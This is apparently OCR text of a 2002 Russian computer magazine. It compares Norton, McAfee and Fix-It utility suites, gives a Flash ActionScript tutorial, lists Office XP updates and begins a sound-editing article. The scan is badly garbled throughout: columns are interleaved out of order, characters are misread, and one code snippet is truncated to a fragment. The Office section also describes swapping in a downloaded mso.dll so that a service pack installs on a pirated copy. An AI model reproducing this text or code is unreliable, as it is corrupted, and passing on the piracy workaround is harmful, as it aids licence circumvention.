надолго задуматься о правильнос- 
ти выбора. Лично я знаю три продукта, 
которые подходят под это описание, 
достаточно известны и проверены вре- 
менем. Это Norton Utilites, Mcaffee 
Utilites (в девичестве Nuts&Bolts) и 
Ontrack Fix-It Utilities. Kak сказал бы зе- 
леный предводитель джедаев (ака Cep- 
гей Сергеич): «Пришел я, чтобы спор 
разрешить давний: кто же лучше из них? 
Война клоническая началась!». 
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знаешь 


программ из доблестного семейства 
оптимизаторов-твикеров? Наверное, много. И многие из них несут 
доблестную службу на твоем компе. Но среди них, как и в любой 
армии, есть солдаты, а есть тяжелая артиллерия :). 


УСТАНОВКА 

Не пойми неправильно, учить тебя ис- 
пользовать визарды никто не собира- 
ется, здесь действительно есть, о чем 
поговорить. Fix-It без проблем ставит- 
ся на любую винду, Mcaffee не ставит- 
ся на 2К/ХР вообще (ну, не совсем :)), а 
с NU все сложнее. Дело в том, что су- 
ществует несколько вариантов постав- 
ки от Symantec: основная это Norton 
SystemWorks 2002, в нее входит также 
антивирус, Winfax, Cleansweep (типа 
чистильщик, но весьма недоработан- 


ный, есть проги много лучше), Goback 
(создание точек восстановления и от- 
кат системы, хорошая вещь, но жрет 
много ресурсов), Process-Viewer (ма- 
ленький, быстрый и удобный task тап- 
ager, у меня стоит именно он, а не ши- 
роко рекламируемый Starter). По- 
скольку программа требует IE5 (нафиг 
оней - непонятно), то и он лежит в дис- 
трибутиве. Я видел диски, где в пакет 
включен еще и фаерволл (наверное, 
пираты постарались :)). Щедрый аль- 
янс Зутащес-Горбушка :). Но тут есть 
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подвох: Ha 2k/XP встанет все, кроме 
самих NU :(. На эти оси ставятся только 
NU, идущие отдельно, т.е. Norton 
Utilites 2002, но по утилитам и по наст- 
ройкам они заметно отличаются от SW, 
причем в меньшую сторону. МсаНее 
Utilites в своем текущем состоянии 
(3.11) действительно не видит 2К/ХР, 
но вот-вот появится версия 4.0, в кото- 
рой данная бага в корне исправлена. К 
моменту выхода статьи ее будет впол- 
не реально найти на той же Горбухе. 
Последняя версия Fix-It - 4.0, выходил 
достаточно серьезный апдейт, сове- 
тую скачать, хотя и так неплохо работа- 
ет, в поставку входит антивирус от 
Тгепа. Все программы в конце процес- 
са установки предложат создать 
Rescue disc, но сделать это можно и 
после установки (недоступно в 2к/ХР). 
Советую сделать и обновлять почаще. 
Rescue disk от Нортона меня как-то ре- 
ально спас, ибо он умеет восстанавли- 
вать Fat и Partition Table (ненавижу вы- 
ключение электричества посреди ра- 
боты Partition Magic :)). Правда, он за- 
нимает три дискеты, а остальные - од- 
ну, зато его можно записать на любое 
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устройство. Советую, кстати, почитать 
мануал в Pdf - там много говорится про 
восстановление информации с помо- 
щью Diskedit, вдруг пригодится (чур, 
меня, чур). Уфф... ну, вроде разобра- 
лись. Начинаем тестить! 


ЗОВИ МЕНЯ ИНТЕГРАТОР 
Когда видишь в первый раз все про- 
граммы - начинаешь думать: кто у кого 
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номия времени. У Mcaffee, правда, есть 
свой ланч-бар, который можно редак- 
тировать, но один его внешний вид BbI- 
зывает желание быстренько его за- 
крыть и снести вместе с самими утили- 
тами :). У Нортона еще имеется 
«SymTray» - все проги из пакета имеют 
в трее один значок и выпадающую ме- 
нюшку, вроде как экономит место и об- 
легчает доступ, хотя лично я это отру- 


Ш. 
Lia 


ix-If вез пролем ставится на лювую винду, Mcaffee не ставится 
на 2К/НР вообще, а с NU все сложнее. 


спер идею оболочки :), настолько они 
похожи. 

Все они достаточно удобны, хотя раз- 
бивка на разделы, по-моему, лучше у 
Fix-It, а сама идея - у Нортона. Дело в 
том, что оболочка от Symantec - это от- 
дельный продукт. Любая их современ- 
ная программа встраивается в оболоч- 
ку, и ее запуск и опции становятся до- 
ступны оттуда. Налицо удобство и эко- 


бил. Все проги пытаются облегчить 
жизнь пользователю с помощью раз- 
личных визардов, правда, МсаНее и 
здесь облажалась :). Их «First Aid», ко- 
нечно, симпатичен, но вот слегка 
странный набор тестов и отказ остано- 
виться сразу после нажатия на сапсе! 
отбивают всякую охоту им пользовать- 
ся, лучше уж я ручками все сделаю. 
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Fix-It подошла к делу более обстоятель- 
но. В наличии имеются аж четыре ви- 
зарда на все случаи жизни: «SpeedUp» - 
в основном различная дефрагмента- 
ция, «CleanUp» - очистка реестра, куки, 
кэша и т.п. (на самом деле, все эти чис- 
TUJIBLUUKU В больших программах - от 
лукавого, как-нибудь попозже мы по- 
знакомимся со специализированными 
прогами по очистке, намного лучше вы- 
полняющими свои функции). «FixUp» - 
занимается проверкой диска и реестра, 
поиском хардварных проблем и бэка- 
пом системных файлов. «All-in-One», как 
не трудно догадаться (из названия), со- 


держит в себе все визарды, хотя поль- 
зоваться им часто не приходится. 

В состав NU входит визард «System 
check», занимающийся проверкой дис- 
ка, реестра, уровня дефрагментации, 
состоянием «Везсие disk». B 
SystemWorks обладает фичей «One but- 
ton checkup» - очередное интеграцион- 
ное решение от Symantec. В эту провер- 
ку включено также антивирусное скани- 
рование, проверка обновлений антиви- 
русных баз, проверка свободного мес- 
та, проверка системных файлов, при- 
чем, если один из компонентов не уста- 
новлен, тебе об этом напишут. Единст- 
венный глюк этой программы, который 
я заметил, - даже если одна из проблем 
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была поставлены на игнорирование, ви- 
зард все равно будет о ней писать, в от- 
личие от остальных утилиток. 

За интерфейс плюсик получает Нортон. 
За визарды по плюсику получают Fix-It и 
Нортон, а МсаНее пока отстает. 


ДОКТОР, А ЧТО С МОИМ ДИСКОМ? 

Надеюсь, ни для кого не секрет, что 
стандартные виндовые дефрагмента- 
тор и Scandisk далеки от совершенства. 
Посмотрим, что предлагают нам взамен 
рассматриваемые пакеты. «Disk minder» 
от МсаНее и «Disk Doctor» от Нортона 
равны по функциональности и по скоро- 
сти проверки, возможно «Disk Doctor» 


Ногда видишь в первый раз все программы - начинаешь думать: 


кто у кого спер идею оболочки :], настолько они поножи. 


чуть-чуть быстрее, но на глаз это неза- 
метно. «DiskFixer» от Ontrack разочаро- 
вал. Тестовый диск он проверял почти в 
два раза дольше, чем его коллеги. Сто- 
ить отметить странное нежелание про- 
верять поверхность у дисков на FAT32 
при работе в 2К/ХР как у «Disk Doctor, 
так и у «DiskFixer». У «Disk Doctor» это 
лечится установкой опции «enable free 
space testing» (причем тут тест свобод- 
ного места - непонятно, ну да ладно), 
как быть с «DiskFixer» я не знаю. Если 
кто встречался с этой проблемой - по- 
делитесь с народом. Кстати, у всех па- 
кетов есть так называемый «Disk Image» 
(или snapshot) - создание слепка диска, 
который затем используется в других 
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4. Красиво и бесполезно 
самый визард 


5. Самый, 


утилитах пакета. «Disk Image» почему-то 
недоступен в NU под 2к/ХР. 

Диск мы проверили, будем оптимизи- 
ровать. Процесс дефрагментации до- 
статочно долгий, но скорость работы 
после нее повышается очень сильно. 
«Disk tune» от МсаНее и «JetDefrag» от 
Ontrack приблизительно равны по ско- 
рости, правда «Disk tune» сильно грузит 
систему, хотя настройки позволяют ре- 
гулировать отданные на растерзание 
ресурсы. В настройках «JetDefrag» под, 
2к/ХР есть возможность задать дефраг- 
ментацию файла подкачки и журналь- 
ных файлов при следующей загрузке - 
удобно и быстро. Также у Ontrack есть 
фирменная технология IntelliCluster, ко- 
торую, правда, надо отдельно включить. 
Суть в том, что небольшая прога висит в 
памяти и собирает сведения о часто за- 
пускаемых программах, чтобы потом 
эта информация использовалась при 
дефрагментации, что по идее должно 
повысить ее эффективность. «Speed 
Disk» от Symantec под 2к/ХР и под 9x - 


Нажми на кнопку - 
получишь результат 


Speed Disk под ME... 


...И nog XP - 
почувствуй разницу 


это фактически две разные программы. 
Когда-то «Speed disk МТ» выпускался 
как отдельный продукт, и теперь его 
включили в NU под НТшные оси. 

Но и версия под 9x тоже хороша, она 
умеет оптимизировать файл подкачки 
и по умолчанию переносит его в нача- 
ло диска, умеет временно выгружать 
из памяти все приложения, так что де- 
фрагментация проходит очень быст- 
ро, особенно, если она запущена из 
«Norton optimization wizard» (о нем не- 
сколько позже). В 2к/ХР версии есть 
только настройки использования сис- 
темных ресурсов, но я бы не сказал, 
что она работает медленнее. Среди 
рассмотренных утилит «Speed disk» 
без вопросов лучшая, ставлю жирный 
плюс. Специально для забывчивых: во 
всех пакетах имеется функция восста- 
новления файлов. И «Norton UnErase», 
и «МсаМее Trashguard», и «File 
Undeleter» резервируют место на дис- 
ке для защищенных файлов и имеют 
функции поиска по свободному месту 
на диске с целью восстановления (на 
NTFS не работает). В Fix-It это реали- 
зовано плохо: нет возможности ука- 
зать исключения, поиск в директории, 
восстановить что-либо почти нере- 
ально. Лучшим опять стал Нортон. 
Кстати, и Нортон («Wipeinfo»), и 
Mcaffee («Shredder») умеют еще и без- 
возвратно удалять файлы с диска, за- 
тирать свободное место. Fuck da 
spezsloozhbas! 


СВЯЩЕННОЕ ДЕРЕВО 

Ухоженный реестр - залог здоровья сис- 
темы. Его надо проверять, чистить, оп- 
тимизировать. И без верных помощни- 
ков тут никак не справиться. Кого же мы 
выберем? МсаНее предлагает нам ре- 


ковый, хотя рассчитанный больше на 
удаление неверных ключей, чем на их 
исправление. Symantec предлагает нам 
«Registry Editor» (можно также редакти- 
ровать !-файлы), «Registry Tracker» - 
делает снимки реестра и последующее 
сравнение, весьма полезная вещь (жир- 
ный минус - эти две утилиты недоступны 
под 2к/ХР), и «WinDoctor». Функция по 
оптимизации реестра входит в «Norton 
optimization wizard». Основное отличие 
«WinDoctor» - он не рассчитан на удале- 
ние мусора из реестра. Зато только он 
умеет нормально искать недостающие 
системные файлы, ошибки ActivexX/Com 
секций реестра и многие другие. Най- 
денную проблему можно чинить автома- 
тически, а можно в ручном режиме. 
Можно и проигнорировать, и тогда она 
не будет выводиться в результатах сле- 
дующих проверок. В целом, если ты 
юзаешь какой-нибудь чистильщик реес- 
тра от стороннего производителя, то 
«WinDoctor» можно считать лучшей про- 
граммой по ремонту реестра. В резуль- 
Tate - плюс NU и полплюса Fix-It. 


СКОБЯНЫЕ ИЗДЕЛИЯ 

Системные мониторы... Во время сво- 
их оптимизаторских изысканий я часто 
пользовался «System Doctor» от Норто- 
на, поскольку в нем имеется прилич- 
ный набор датчиков, которые можно 
настроить по своему вкусу, да и систе- 


му он грузит не 
сильно. Впрочем 
«WinGauge» OT 
МсаНее не очень 
отстает от него. А 
вот Fix-It разоча- 
ровал: мониторы 
выбираются из 
встроенных, сис- 
темных, свои, ви- 
димо, сделать не 
захотели. Для же- 


дактор реестра (от Regedit отличается 
не сильно) и «Registry Wizard», позволя- 
ющий: архивировать, очищать, чинить и 
оптимизировать реестр. Из всего этого 
добра может пригодиться только опти- 
мизация, ибо очистка и ремонт сделаны 
откровенно плохо, а для архивирования 
есть Scanreg. И зачем копировать стан- 
дартные системные функции? У Fix-It в 
наличии имеется «RegistryCleaner» 
(практически такой же, как в МсаНее), 
«RegistryEditor», слегка удобнее стан- 
дартного, RegistryFixer (достаточно ори- 
гинальный) и RegistryDefrag - оптимиза- 
тор реестра. Оригинальность 
«RegisrtryFixer» заключается в том, что 
все ошибки он делит на три части: зеле- 
ные он чинит сам, в желтые можно вме- 
шаться, красные он не будет чинить без 
твоего ведома. Ремонт получается тол- 


лающих ознако- 
миться с состоя- 
нием системы 
имеются 
«Discover pro» от 
Mcaffee, «System 
information» от 
Нортона, «System 
Explorer» от Ontrack. В Fix-It ecTb сред- 
ство поиска проблем железа - 
«PCDiagnostics», МсаНее пытается 
сделать это в своем «First Aid», о KOTO- 
ром уже говорилось выше. В предыду- 
щих версиях NU тоже была подобная 
утилита (вроде называлась «Norton 
Diagnostics»), но теперь ее нет. На- 
сколько это правильно - я не знаю, но 
для тестирования железа есть много 
специализированных программ, кото- 
рые лучше справляются со своим де- 
лом. Плюсов не дам никому ;). 


ФИШКИ 

Коротко об особенностях пакетов. В со- 
став Fix-it входят такие вещи, как «Disk 
Verifier» - проверка CD на ошибки (осо- 
бо не нужно, так как эта функция есть в 
хороших программах для записи дис- 


Mescue disk от Нортона меня как-то реально спас, HBO он умеет 


А ГИГАНТОВ: ВОЙНА КЛОНОВ 


ков. Если только старые диски прове- 
рять...), «ClockSync» - если тебе важна 
точность времени до секунды, может и 
пригодится, хотя программ для синхро- 
низации времени - полно. «SMART 
defender» - а вот это может пригодить- 
ся, ЭМАНТ-диагностика жестких дис- 
ков. «CrashProof» - аналог «CrashGuard» 
от Нортона, вроде как предотвращает 
ошибки виндов. ИМХО, бесполезная 
вещь. «Easy Recovery» - вообще это от- 
дельный продукт Ontrack для восста- 
новления данных. В пакет входит lite- 
edition, позволяющая восстановить до 
50 файлов. Ничего хорошего или плохо- 
го про нее сказать не могу, ибо в таких 
случаях у меня под рукой был бэкап. Но, 
наверное, может спасти... «Error 
Тгаскег» - отслеживает и записывает 
ошибки системы (очень интересное 
чтиво, наверное, получается :)). Фишки 
от МсаНее интересны своей бесполез- 
HOCTbIO. «Zip Manager» - зачем? Теперь 
даже в саму винду встроена работа с 
архивами. «Quick copy» - неудобно, да и 
ничуть не быстрее обычного копирова- 
НИЯ. «Safe&Sound» - средство резерв- 
ного копирования (ну, может и приго- 
дится, HO...). «EZ Setup» - кое-какая на- 
стройка виндов (не устаю рекламиро- 
вать твикер для настоящих мужчин - Х- 
Setup, www.x-teq.com). «Launch rocket» - 
выглядит вроде интересно. Прога nepe- 
страивает запускаемые файлы, чтобы 


те быстрее запускались. Загорелся, ре- 
шил проверить, вот результат: до опти- 
мизации Photoshop грузился за 23 се- 
кунды, после - за 21. Выводы делайте 
сами, лично я считаю, что такое ускоре- 
ние не стоит затраченной на эту про- 
грамму памяти. У Нортона фишек, в об- 
щем-то, и нет, если не считать 
«Optimization wizard». Прога выставляет 
размер свопа и диск, на котором он бу- 
дет размещаться, оптимизирует ре- 
естр. После перезагрузки запускает де- 
фрагментацию (правда, не всегда, а 
при определенном уровне фрагмента- 
ции), причем перед загрузкой других 
программ. За эту фишку можно ставить 
жирный плюс. 


ВЕРДИКТ 

К чему же мы пришли? МсаНее плетется 
позади, позоря славное имя Nuts&Bolts. 
А ведь когда-то она была на голову вы- 
ше Нортона... Norton SystemWorks 2002 
- лучшее решение для win9x. А вот для 
2к/ХР выбора практически нет - надо 
ставить Fix-It, ибо NU под эти оси пора- 
жает своей недоработанностью. Луч- 
шим вариантом будет, наверное, ском- 
бинировать работу этих программ, как, 
например, делаю я. Может с выходом 
новых версий ситуация и изменится, а 
пока... «Пусть сила поможет тебе, юный 
Скайуокер». 


Все куски комплексов, одаренные 
плюсами, будут подробно рассмот- 
рены в ближайших номерах в боях с 
независимыми конкурентами. 
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о вот беда: надпись-то остается од- 
ной и той же уже месяц? Да и мыша 
над этой байдой не особо вырази- 
тельная. Это не соответствует твоему 
имиджу и подлежит корректировке. 


LOADING... 
Начнем с легкого. Иди в папку, где лежат 
файлы *.fla и *.swf, созданные за про- 
шлый сеанс. Создай там текстовик 
«mytext.txt» u набей в него «text=He грус- 
ти - загрузи!» (только без кавычек). 
Теперь Flash. Ткни правой кнопкой мы- 
ши на клипушнике «Main» на твоей Рабо- 
чей области и выбирай в выпавшем ме- 
ню пункт «Операции» («Actions»). В экс- 
пертном режиме (Ctrl+E) вводи: 
onClipEvent (load) { 
loadVariables(«mytext.txt»,this) 


} 

onClipEvent (data) { 
str.str1=text; 

} 


Ты, бесспорно, самый крутой флешер и 
программер мира сего, но я все же на 
всякий случай поясню, что дает этот код, 
:). Конструкция onClipEvent () выполняет 
какие-либо заданные действия по собы- 
тию клипа, указанному в скобках. Собы- 
тие load значит «загрузка», прикинь :). Ит 
MUHB, что операция 
loadVariables(«mytext.txt», this), которая 
грузит переменные из файла «mytext. txt» 
на текущий уровень, выполнится лишь 
по загрузке данного клипа. Все опера- 
ции, связанные с событием data, срабо- 
тают, когда окончательно грузанутся все 
переменные из указанного файла. Т.е. 
переменной «$1.51» (а ты наверняка 


7Ч september/09/2002 


помнишь, что это текст 
нашей бегущей строки) 
присвоится значение 
только что загруженной 
переменной «text». 

Зачем, собственно, все 
это нужно было-то? А за- 
тем, чтобы тебе, перец, не напрягаться 
лишний раз, загружая Flash, дабы изме- 
нить текст бегущей строки. 

Только стоит тебе знать один нюанс: на- 
ша строка $1 в самой флешке, как из- 
вестно, осталась не пустой. Так вот, это 
было сделано не зря, т.к. размер (длина) 
этой строки при присвоении ей нового 
текста не изменится. Так что не особо 
удивляйся, если после ввода очень 
длинной строки в текстовик у тебя обре- 
жется ее половина в Swf и, следователь- 
но, на обоях. И, кстати, скрипт, двигаю- 


жешь дальше не читать (шучу, конечно, 
читай на здоровье, может быть, все же 
узнаешь чего новое ;)). 

Я опишу только один из способов замены 
курсора клипом. У него есть свои преиму- 


i 
[а-ля press, release и т.п.], если она закрыта CBepxYy другой кнопкой. 
ЕТО ОА ЕЕ 


щий мувик с текстом, в таком случае 
становится немного недоделанным :))). 
Попробуй в качестве тренировки это ис- 
править. Я знаю, для тебя это раз клик- 
нуть. На крайняк мыль - помогу. 


РАЗНЕСИ КУРСОР! 

По-моему, издевательство во Flash’e 
над курсором мыши - есть существен- 
ный шаг к статусу продвинутого флеше- 
ра. Если ты уже God в этом деле, мо- 


щества и баги, но все равно он будет наи- 
более оптимальным для начинающего. 

Для начала нам нужен будет курсор, кото- 
рый стоит у тебя для основного режима. 
Можно импортировать реальный курсор, а 
потом отредактировать (убрать фон, оста- 
вив одну лишь стрелку). Хотя гораздо луч- 
ше и быстрее было бы этот самый курсор 
просто нарисовать, благо средств рисова- 
ния во Flash’e хватает. Этот нарисованный 
курсор загони в символ (выдели его и жми 


4 F8) типа 
— «Графика» 
(Graphic) и на- 
зови его 

«Сиг». Пе- 

ремести 
центр (Мо- 
дифика - 
ция/Трансформиро- 
вание/Редактирова- 
ние центра) этого но- 
вого символа на самый 
кончик стрелки. 

Теперь настала очередь 
\ для наиболее сложного 
ь для некоторых (но, я 
\ уверен, не для тебя 
:))) действия - рисо- 
вания анимации. Со- 
здай новый клип (имя - 
«Cur-Bomb»). В этом 
клипе надо нарисовать 
взрыв курсора. Только 
‚ сделай это так, чтобы 
начинался ролик с це- 
лого и невредимого 
курсора, расположен- 
ного кончиком стрелки 
прямо в центр Рабочей 
области, а заканчивал- 
ся плавным располза- 
нием кусочков курсо- 
ра в стороны с одно- 
временным уменьше- 
нием их прозрачнос- 
ти. Сделать расползание можно так. Раз- 
режь инструментом Лассо указатель на 
несколько неровных кусков и расположи 
их друг над другом в разных слоях так, 
чтобы они якобы образовывали целый 
курсор. Ну а потом для каждого из них 
делай Motion Tweening, типа эти куски 
курсора разлетаются в разные стороны и 
становятся прозрачными. В самом ниж- 
нем слое можно вставить анимацию 
стрелки той же формы, что и курсор, 
только полностью красного цвета. Сде- 
лай эту стрелку потихоньку увеличиваю- 
щейся, с уменьшающейся прозрачнос- 
тью (чем меньше значение Alpha, тем 
прозрачнее объект) в течение всей ани- 
мации - будет красиво :). В первый кадр, 
там, где курсор еще целый и невреди- 
мый, поставь команду stop(). 

В качестве фона для курсора создадим 
(СШ + F8) новый символ кнопки, назвав 


русти 
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ero «Fon-Button». Кнопка автоматом OT- 
кроется для редактирования. Прямо над 
центром Рабочей области рисуй прямо- 
угольник. Двойным щелчком Стрелкой 
по его рамке выделяй ее затем, чтобы 
удалить - без нее легче. Выдели остав- 
шийся прямоугольник заливки и в пане- 
ли Микшер (Mixer) сделай его абсолютно 
прозрачным. Видишь наверху на вре- 
менной шкале четыре крупных помечен- 
ных кадра? Первый из них отличается от 
остальных? Это потому, что он не пустой 
- именно в нем наш прямоугольник. Хва- 
тай этот кадр и тащи его в четвертый 
кадр, а потом с зажатым Shift’om - обрат- 
но в первый. Что мы получили? Первый 
кадр растянулся на четыре клетки. 
Открой из библиотеки символ «Мат» и 
перетащи в него из той же библиотеки 
нашу «Fon-Button» и клип «Cur-Bomb». В 
панели Копия (Instance - Ctrl + 1) укажи 
для последнего имя «bomb». Кнопку фо- 
на расположи и растяни так, чтобы она 
полностью (уж если не сама, то вместе с 
кнопкой «MyButton») закрывала всю Ра- 
бочую область (не стремайся, помни, что 
кнопки прозрачные! :)). Теперь помести 
ее выше всех символов на Рабочей обла- 
сти (Модификация/Выстраивание/Пе- 
реместить на самый верх), а после этого 
подними наверх и кнопку «MyButton» 
(просто фишка в том, что кнопка никак на 
будет реагировать на события мыши (а- 
ля press, release ит.п.), если она закрыта 
сверху другой кнопкой. Обе кнопки нам 
нужны на самом верху, причем 
«MyButton» должна быть выше всех :). 


Mouse.Hide() 

Hy, дружище, теперь, когда напряг рисо- 
вания позади, перейдем к созданию 
скриптов. Я не знаю, какое у тебя выра- 
жение лица, когда ты слышишь от меня 
что-то вроде «давай покодим» или 
«ActionScript». Надеюсь, в такие момен- 
ты у тебя на лице расползается добрая 
улыбка маньяка, только что выполнив- 
шего очередную миссию :). В конце кон- 
цов, не так уж много программирования 
в этом Flash’e! 

В клипе «Мат» жми правой пимпой мы- 
ши на экземпляр кнопки «MyButton» на 
Рабочей области и в открывшемся меню 
выбирай Операции (Actions). Там уже 
есть кое-что. Из этого чего-то привыч- 
ными движениями пальцев в области ус- 
тройства ввода (клавы) надо сделать 
следующее: 
on (г ver) + 


Разберем все по порядку. В код для 
rollOver (мышка НАД) мы добавили четы- 
ре новые строки. Первые две из них при- 
сваивают клипу «bomb» координаты кур- 
сора мыши. По команде 
startDrag(_root.main.bomb) этот клип 
«прилипает» к курсору мышки, а благода- 
ря штучке Mouse.hide() прячется реаль- 
ный виндовский курсор. В rollOut (мышка 
НЕ НАД) теперь прекращается таскание 
клипа «bomb» за мышкой, он выносится 
за пределы swf, и мы снова видим роди- 
мый мастдаевский указатель :). Когда ты 
кликнешь (оп(рге5$)) по кнопке, клипу 
_root.main.bomb будет дано указание на- 
чать проигрываться со второго кадра (как 
раз там, где начинается разрушение кур- 
сора). Клип проигрывается один раз, ав- 
томатически возвращается и останавли- 
вается на первом кадре, там, где целый и 
здоровый символ «Cur, и ты снова готов 
к разрушительному клику :). 

В новоиспеченную пимпу «Fon-Button» 
вставляем все то, что мы сейчас доба- 
вили в «MyButton». У тебя должно там 
получиться: 


Это был один из способов создания сво- 
его курсора Bo Flash’e. Если ты просве- 
щен (или хочешь просветиться) в этой 
теме и хочешь поделиться своим мнени- 
ем, то не медли с мылом. 

Ну вот и все! Дави С + Enter. Смотри на 
строку, на новый курсор. А главное, кли- 
кай, кликай, кликай! 

И да пребудет с тобой Великий Flash! 
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ак ты, наверное, знаешь, больше 

всего в Microsoft’e думают о безо- 

пасности использования их про- 
дуктов :). В одном из посланий Билла 
Гейтса к подопечным содержались 
слова, которые предопределили на- 
правление доработок выпускаемых 
программ: «Когда нужно выбирать 
между новыми возможностями и уст- 
ранением прорех в системе защиты, 
следует позаботиться в первую оче- 
редь именно о безопасности, иначе 
пользователи просто не смогут приме- 
нять новые возможности». Ню-ню. 


запись в реестр Software\Microsoft\ 
Windows\CurrentVersion\Installer\InPro 
gress»). 

Если у тебя стоит Win2k и ты скачал 
Windows Installer 2.0 до марта 2002 ro- 
да, то приется снова качать WI и nepe- 
ставлять его, так как в предыдущей вер- 
сии криво ставилась библиотека 
MSPatcha.dll! Фишка в том, что в Win2k 
MSPatcha.dll защищена системной 
файловой защитой. Поэтому любое об- 
новление файла должно быть зареге- 
но виндами. Файл установки 
Instmsiw.exe для Windows Installer 2.0 


ЕЙ 


Если y tesa стоит Win2k и ты скачал Windows Installer 2.0 до марта 
2002 года, то придется снова качать Ш! и переставлять его, так 
как в предыдущей версии криво ставилась вивлиотека 


WINDOWS INSTALLER 2.0 
Windows Installer 2.0 - это прога для yn- 
равления установкой и обновлением 
офиса. WI управляет установкой раз- 
личного софта, добавлением и удале- 
нием компонентов программ, поддер- 
живает восстановление прог. В этой 
версии WI исправлены ошибки и недо- 
работки более ранних версий инстал- 
лятора (1.0, 1.1 и 1.2), введена под- 
держка цифровых подписей, при уста- 
новке исправления перестало быть 
обязательным наличие дистрибутива, 
при установке софта с помощью 
Windows Installer перестала возникать 
ошибка 1406 («невозможно добавить 
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не включает информацию 
06 обновлении файла. 
Вот почему необходима 
установка новой вер- 
сии MSPatcha.dll на 
двухтысячные. 


Если юзаешь Win2k, то качай WI 2.0 сад- 
реса http://download.microsoft.com/ 
download/Windowslinstaller/Install/2.0/ 
NT45/EN-US/InstMsiW.exe (1780 кб); ес- 
ли Win9x или WinMe, то http://downlo- 
ad.microsoft.com/download/WindowsIn- 
staller/Install/2.0/W9XMe/EN- 
US/InstMsiA.exe (1669 кб). Владельцам 
Win XP ставить WI 2.0 уже не нужно :). 
Интеграция, мать ее. 


SERVICE PACK 1 
ДЛЯ MICROSOFT OFFICE XP 
Эта комплексная заплатка повышает 
безопасность и устойчивость работы 
ХР’шного офиса от M$. В нее вошли от- 
дельные обновления разных компо- 
нентов офиса, выпущенные раньше: 
Outlook 2002 (21 июня 2001 г.) - повы- 
шает быстродействие Outlook’a при 
его использовании на серверах 
Exchange и совместно со средствами 
мгновенной передачи сообщений; 
Word 2002 (июнь 2001) - предотвра- 
щение запуска макросов при открытии 
документов без уведомления тебя пе- 
ред этим; 
Publisher 2002 (21 июня 2001 г.) - To- 
тальное прекращение тормозов при 
редактировании страниц, созданных в 
более ранних версиях MS Publisher; 
Веб-компоненты Office 2002 (16 
августа 2001 г.) - обеспечение 


ae повышенного уровня безо- 


пасности и производи- 
тельности веб-компо- 
нентов офиса; 


Outlook 2002 (16 августа 2001 г.) - до- 
полнительные исправления безопас- 
ности для элементов управления 
ActiveX (предотвращение запуска ann- 
летов с помощью скриптов на страни- 
цах сайтов), блокирование запуска ря- 
да зло-аттачей к письмам; 

Мастер активизации Microsoft Office 
ХР (4 октября 2001 г.) - до установки 
SP-1 офис не определял некоторые де- 
вайсы компа после апгрейда. После ус- 
тановки SP-1 для Office ХР такая про- 
блема перестала существовать; 
Outlook 2002 (4 октября 2001 г.) - но- 
вые заплатки и повышение быстро- 
действия; 

PowerPoint 2002 и Excel 2002 (4 октя- 
бря 2001 г.) - мегаглюк: в макросах 
можно было отключать уведомление о 
запуске макросов. Докатились. Service 
Pack 1 пресекает такие попытки раз и 
навсегда. 

SP1 инстальнется без проблем, даже 
если ты уже установил некоторые из 
указанных выше апдейтов. Пользова- 
телям винтукея рекомендуем поста- 
вить Windows Installer 2.0 перед серви- 
спаком. Кроме того, придется скор- 
мить инсталлятору путь к дистрибутиву 
офиса при установке обновления, что- 
бы избежать конфликта версий. 
Service Pack 1 для MS Office ХР можно 
скачать по адресу http://down- 
load.microsoft.com/download/officexp- 
standard/sp/oxpsp1/w98nt42kmexp/ru/ 
oxpsp1.exe. Но тут есть одна проблема 
- при установке SP1 на пиратскую вер- 
сию офиса тебе будет сказано, 
что размер библиотеки 
mso.dll отличается от 
нужного. В таком 
случае с помо- 
щью того же file- 
search.ru найди 
и скачай файл 
mso.dll, имею- 
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щий размер 9,53 МБ (9995680 байт). 
Замени свежескачанным файлом свою 
старую версию mso.dll (по умолчанию 
находится в C:\Program Files\Common 
Files\Microsoft Shared\Office10) и сме- 
ло ставь апдейт. Без установленного 
Office XP SP1 будет невозможно даль- 
нейшее обновление офиса. 


ОБНОВЛЕНИЕ ПРОВЕРКИ 
ПРАВОПИСАНИЯ ДЛЯ OFFICE ХР SP-1 
Этот апдейт обновит компонент Speller 
Update, отвечающий за проверку пра- 
вописания в офисных приложениях. 
Расширен словарный запас офиса, в 
том числе, по заверению мелкомягких, 
исправлены проблемы при проверке 
орфографии в названиях городов, 
улиц, организаций, добавлены ком- 
пьютерные термины. Устранен глюк с 
названиями городов, оканчивающи- 
мися на «abad»: Ворд без апдейта, по- 
лучив название города «lslamabad», 
предлагал заменить его Ha «lslam bad» 
:). Видимо так америкосы втихую бо- 
ролись со своими политическими глю- 
ками :). Скачать апдейт для истинных 
джигитов можно по адресу 
http://download.microsoft.com/down- 
воза а о ре ех рока = 
dard/oxpsu01/1/w98nt42kmexp/en- 
us/oxpsu01a.exe. Для проверки уста- 
новки и работы апдейта посмотри на 
версию библиотеки Msspell3.dll, кото- 
рая должна быть не меньше 1.1.0.6215 
(по умолчанию эта DLL-ka находится в 
папке C:\Program Files\Common 
Files\Microsoft Shared\Proof). 


АЛЬТЕРНАТИВНЫЙ ВВОД ДАННЫХ 
MICROSOFT OFFICE ХР 
(24 ЯНВАРЯ 2002 Г.) 

Один из немногих апдейтов, направ- 
ленных не на повышение безопаснос- 
ти, а на устранение недоработок. Об- 
новление для тех, кто не любит наби- 
вать текст, а предпочитает го- 
ворить в микрофон и 
г м использовать 
распознавание 
речи или рукопис- 
ный ввод. Распоз- 
навание действует 
только на английские 
речь и алфавит, но зато 
после установки апдейта 
можно говорить с неболь- 
шим акцентом (дарагой, 
пачем мандарины, а?). Ска- 
чать апдейт можно по адресу 
http://download.micro- 
soft.com/down- 
load/officexpstan- 
dard/oxpauiu/1/ 
w98nt42kmexp/en- 
us/oxpauiu.exe. При 3a- 
пуске OH поменяет несколь- 
ко библиотек, по версиям ко- 
торых можно узнать о том, 
что он все же установился: 
ЗРПИР.А! станет версией 
5.1.2409.24, а MSCTF.dll и 

MSIMTF.dll - 5.1.2409.22. 


Все, снаряжай WI и выкачи- 
вай заплатки. А может 
быть, твоя девчонка муча- 
ется заподлянскими виру- 
сами в макросах ворда? Так 
какого ты тут сидишь??? 
Спасатели, вперед! Пива 
нам заодно прихватите... 
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a настройках профессиональных звуко- 
» 4 ‘вых редакторов можно потеряться и 

< „блуждать голодным несколько дней. А 

‘`Лное освоение уйдет пара лет (как раз 

~ ye = и обновятся). Лажа это все. Сегодня мы 
прогоним тебе мазу, что мутить на писюке су- 


масшедшие звуки не просто. .. XMMM... просто, 
но и прикольно. 


Нужны сносная звуковая карточка и микро- 
фон. Конечно, понадобится комп, куда ты 
все это воткнешь. Ну и, конечно, понадобят- 
